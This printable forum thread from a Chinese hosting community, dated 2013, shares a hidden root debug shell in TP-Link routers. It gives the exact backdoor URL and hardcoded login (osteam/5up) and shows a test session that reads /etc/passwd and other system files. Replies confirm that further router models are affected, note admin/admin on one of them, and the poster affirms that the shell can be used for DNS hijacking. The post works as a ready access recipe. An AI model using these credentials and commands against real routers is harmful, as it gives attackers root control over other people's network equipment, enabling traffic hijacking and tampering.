全球主机交流论坛

标题: 【干货】TP-LINK用户的福利之路由器shell [打印本页]

作者: 过客    时间: 2013-5-26 19:24
标题: 【干货】TP-LINK用户的福利之路由器shell
本帖最后由 过客 于 2013-5-26 19:26 编辑

TP-Link  WDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。

固件版本:3.12.11 Build 111130 Rel.55312n and possibly others

exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html

User: osteam  Password: 5up

使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。

==============以上是废话==============

过客的路由器是:TP-Link TL-WR941N
软件版本:3.11.7 Build 100723 Rel.46142n
硬件版本:WR941N v4/v5 00000000

开始测试:
  1. cat /proc/cpuinfo&
  2. 827
  3. # system type                : Atheros AR7240 (Python)
  4. processor                : 0
  5. cpu model                : MIPS 24K V7.4
  6. BogoMIPS                : 265.21
  7. wait instruction        : yes
  8. microsecond timers        : yes
  9. tlb_entries                : 16
  10. extra interrupt vector        : yes
  11. hardware watchpoint        : yes
  12. ASEs implemented        : mips16
  13. VCED exceptions                : not available
  14. VCEI exceptions                : not available

  15. cat /etc/passwd&
  16. 828
  17. # root:x:0:0:root:/root:/bin/sh
  18. Admin:x:0:0:root:/root:/bin/sh
  19. bin:x:1:1:bin:/bin:/bin/sh
  20. daemon:x:2:2:daemon:/usr/sbin:/bin/sh
  21. adm:x:3:4:adm:/adm:/bin/sh
  22. lp:x:4:7:lp:/var/spool/lpd:/bin/sh
  23. sync:x:5:0:sync:/bin:/bin/sync
  24. shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
  25. halt:x:7:0:halt:/sbin:/sbin/halt
  26. uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
  27. operator:x:11:0:Operator:/var:/bin/sh
  28. nobody:x:65534:65534:nobody:/home:/bin/sh
  29. ap71:x:500:0:Linux User,,,:/root:/bin/sh

  30. cat /proc/meminfo&
  31. 843
  32. # MemTotal:        30676 kB
  33. MemFree:         12876 kB
  34. Buffers:          1836 kB
  35. Cached:           6056 kB
  36. SwapCached:          0 kB
  37. Active:           6116 kB
  38. Inactive:         3892 kB
  39. HighTotal:           0 kB
  40. HighFree:            0 kB
  41. LowTotal:        30676 kB
  42. LowFree:         12876 kB
  43. SwapTotal:           0 kB
  44. SwapFree:            0 kB
  45. Dirty:               0 kB
  46. Writeback:           0 kB
  47. Mapped:           4276 kB
  48. Slab:             5436 kB
  49. CommitLimit:     15336 kB
  50. Committed_AS:     4324 kB
  51. PageTables:        276 kB
  52. VmallocTotal:  1048560 kB
  53. VmallocUsed:      1944 kB
  54. VmallocChunk:  1046464 kB

  55. # ls /
  56. bin      etc      linuxrc  proc     sbin     usr      web
  57. dev      lib      mnt      root     tmp      var
  58. #
复制代码
至于利用这个东西能干啥……那就自己发挥吧,走了。

(, 下载次数: 5)
作者: a35253283    时间: 2013-5-26 19:25
额,好牛逼的样子
作者: Zoplor    时间: 2013-5-26 19:26
  我不懂
作者: bnb345    时间: 2013-5-26 19:31
哦。
作者: wos1945    时间: 2013-5-26 19:34
不错。。。
作者: 恋爱ing    时间: 2013-5-26 19:35
谢谢分享
作者: 东方星雨    时间: 2013-5-26 19:38
不懂,能蹭网不
作者: link    时间: 2013-5-26 19:41
不懂。。可以劫持DNS吗?
作者: ybs885    时间: 2013-5-26 19:51
不错啊分享
作者: 莎士比亚    时间: 2013-5-26 20:02
学习了
作者: 哥坏人    时间: 2013-5-26 20:05
80端口被封,还是好事
作者: yohu    时间: 2013-5-26 20:06
有root,不如编译个lnmp,挂载个硬盘,直接当服务器好了。
作者: DOS    时间: 2013-5-26 20:09
唔,有大危害么?有的话发乌云吧。
作者: 过客    时间: 2013-5-26 20:13
link 发表于 2013-5-26 19:41
不懂。。可以劫持DNS吗?

可以,具体百度。
作者: zt1993    时间: 2013-5-26 20:19
密码不对,。。
作者: skwinx    时间: 2013-5-26 20:24
2041n 也有 不过密码错了
作者: skwinx    时间: 2013-5-26 20:28
2041N 我也进去了 账户是 admin admin
作者: 来自未来的家伙    时间: 2013-5-26 20:35
很流弊的样子
作者: ulmate01    时间: 2013-5-26 20:40
刷路由到底要干嘛呢。。。
作者: 基长    时间: 2013-5-26 20:46
841n刚才试了下也可以
                                                                                                                                                              ——来自基长的云签名
作者: datou    时间: 2013-5-26 20:52
本帖最后由 datou 于 2013-5-26 20:53 编辑

fw300r中枪

不过没啥意义,外网访问不鸟
作者: wmfy808    时间: 2013-5-26 21:04
WDR4320无效

作者: Kslr    时间: 2013-5-26 21:10
进来学习一下
作者: hxhui    时间: 2013-5-26 21:12
好牛逼的样子
作者: hackfengl    时间: 2013-5-26 21:12
从界面来看 感觉是人家公司故意留的这么一个后门
作者: rqliang    时间: 2013-5-26 21:38
不要干坏事
作者: sdgl212    时间: 2013-5-26 22:13
不懂
作者: waf7225    时间: 2013-5-26 22:33
openwrt无压力.
作者: a219549    时间: 2013-5-26 22:39
好高端。。。
作者: 气味    时间: 2013-5-27 11:55
不明觉厉……
作者: qqcm    时间: 2013-5-27 12:23
不能刷openwrt或ddwrt,可以添加转向弄tb客
作者: wenhold    时间: 2013-5-27 12:26
表示741n 2年前已被我刷成openwrt 乱玩参数,砖了几年了
作者: sv2222    时间: 2013-5-27 12:29
tp-link都有么?
作者: 过客    时间: 2013-5-27 14:07
sv2222 发表于 2013-5-27 12:29
tp-link都有么?

测试一下就知道
作者: nodhost    时间: 2013-5-27 15:17
makr
作者: junhan    时间: 2013-6-17 15:48
841试了一下也行
作者: xspoco    时间: 2013-6-17 15:54
看起来碉堡了
作者: 气味    时间: 2013-6-17 16:25

作者: paopao00    时间: 2013-6-17 16:29
这个有点用啊




欢迎光临 全球主机交流论坛 (https://52.ht/) Powered by Discuz! X3.4